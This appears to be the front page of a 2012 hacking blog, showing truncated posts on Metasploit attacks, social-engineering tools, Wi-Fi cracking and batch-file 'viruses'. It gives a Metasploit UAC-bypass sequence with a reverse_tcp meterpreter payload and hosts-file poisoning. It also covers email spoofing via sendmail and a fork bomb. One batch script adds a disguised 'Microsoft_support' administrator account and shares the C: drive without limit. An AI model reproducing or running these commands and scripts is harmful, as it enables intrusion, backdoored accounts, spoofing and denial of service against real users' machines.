This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Friday, December 28, 2012

D.N.S. poisoning using metasploit.

Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.(1)Hack remote p.c .(How to hack Remote P.C.?)(2)Now we will Bypass U.A.C. protection of windows.(3)Open Terminal & type following code in terminalmsfconsoleuse exploit/windows/local/bypassuacset payload windows/meterpreter/reverse_tcpset lhost 192.168.1.6set session 1exploit(4)Now we will edit host file.msf >use post/windows/manage/injet_hostmsf post(injet_host)...

Monday, December 24, 2012

How to use R.A.T. through S.E.T?

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).(1)Open your terminal & typecd /opt/set./set(2)update your set(3)Now select option 3 which is Third party Modules(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).(5)Enter I.P. Address of your computer to connect back(6)Port RATTE...

Friday, December 21, 2012

How to install & configure send mail in Ubuntu?

Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our machine as a server. I will show you how to install & configure Send-Mail. So we can spoof email to targets. But problem is that this email is detected as spam due to automatic sending through machine.How to Install Send-Mail?Open terminal & type following command in terminal.sudo apt-get install mailutilssudo apt-get install sendmailHow to configure it?After installing sendmail , you should configure...

Wednesday, December 19, 2012

How to install social engineering toolkit(S.E.T.) in ubuntu?

Social Engineering Tool kit is cool tool which came with BACKTRACK, this increase power of metasploit. If you are on any linux system other than BACKTRACK , then you can install it .Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method. Extra package which is necessary to use SET effectively are as follow.(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.(2)Ettercap:- If you are on any network & want to attack on network like Man in...

Monday, December 17, 2012

Download Free E-books about Hacking

Hello guys, if you want to learn more about Hacking & Computer Security ,i uploaded below eBooks on dropbox.Download link is in end.List of Books are as follow.(1)CEH(Certified Ethical Hackers)2010V6.(2)Hacking Wireless Networks For Dummies.(3)H gray hat hacking.(4)Blind_SQLInjection.(5)backtrack-4-assuring-security-by-penetration-testing.(6)Collections of Ankit Fadia Hacking Book.(7)Secrets of Reverse Engineering.(8)Social Engineering toolkit(9)Ethical Hacking and Countermeasures- Web Applications and Data Servers.New books Added(10)CSRF attack...

Sunday, December 16, 2012

How to use REFREF?

As we know in past , famous Hacktivist group Anonymous carried out series Of DDOS attack in number of websites like paypal ,master-card ,visa. At that time they used tool LOIC for down the website.Although they got success in their project ,but due to LOIC some of hackers arrested later. So they decide to build new weapon for DOS attack.It was REFREF. It is programmed in perl ,java ,python.But main requirement is URL must be vulnerable to SQL injection. It mean if you found website which is vulnerable to SQL injection , then by using this tool...

Thursday, December 13, 2012

Batch File Virus -4

@echo offcd\cd %SystemRoot%\system32\md 1001cd\clsrem N0 H4rm 15 cau53d unt1| N0wrem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000echo 12:00:00.00 | time >> nulecho 01/01/2000 | date >> nulnet users Microsoft_support support /addrem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0untrem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.net localgroup administrators Microsoft_support /addrem 5h4r3 th3 R00t Dr1v3net share system=C:\ /UNLIMITEDcd %SystemRoot%\system32\1001echo...

Wednesday, December 12, 2012

Batch File Virus -3

Most of them have heard about the word ‘fork()’, which is used to create child process, like wise fork bombing is nothing but calling a program by itself again and again with a infinite loop and making the system to crash by popping up hundreds of windows on the screen.@echo off:loopExplorerCall fork.batGoto loopCopy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up...

Tuesday, December 11, 2012

Batch file virus -2

Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.Folder Replicator Virus:Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.1. Just open up a notepad, copy and paste the below codecd\cd...

Monday, December 10, 2012

DNS poisoning using BATCH File

Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS.DNS poisoning:Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that resides...

Friday, December 7, 2012

How to scan web-server with Nikto?

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.Nikto is not...

Tuesday, December 4, 2012

how to Browser Autopwn attack in metasploit?

In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open. In order to use this attack...

Monday, December 3, 2012

How to crack wi-fi password in ubuntu?

For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s(1)install aircracksudo apt-get install aircrack-ng (2) You need to go in root first. For this purpose type “su –“ and type your password. (3)now type following command in terminalCode: # iwconfig wlan0 mode monitoring Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless. (4)After that it’s time to scan for a wireless...

Sunday, December 2, 2012

How to exploit VSFTPD ?

VSFTPD, which stands for "Very Secure FTP Daemon"[1], is an FTP server for Unix-like systems, including Linux.VSFTPD is an FTP server that it can be found in unix operating systems like Ubuntu, CentOS, Fedora and Slackware. By default this service is secure however a major incident happened in July 2011 when someone replaced the original version with a version that contained a backdoor. The backdoor exists in the version 2.3.4 of VSFTPD and it can...

Wednesday, November 28, 2012

How to Hack targeted website(Basic)?

Today is the age of computer and internet. More and more people are creating their own websites to market their products and earn more profit from it. Having your own website will definitely help you in getting more customer purchasing your products but at the same time you can also also attract hackers to play around with your site. If you have not taken enough care to protect your site from hackers then your business can even come to an end because of these hackers.Before you hack into a system, you must decide what your goals are. Are you hacking...

Monday, November 26, 2012

How to exploit robots.txt?

What is robots.txt?Robots.txt is a file that contain path which cannot crawled by bot most of time search-engine bots like google bot or etc. It tells search-engine that this directory is private & can not be crawled by them.If yo are site owner & want to make robots.txt file , then go following link , it will create robots.txt file for you.http://www.mcanerin.com/EN/search-engine/robots-txt.aspso just for now , robots.txt is pretty much...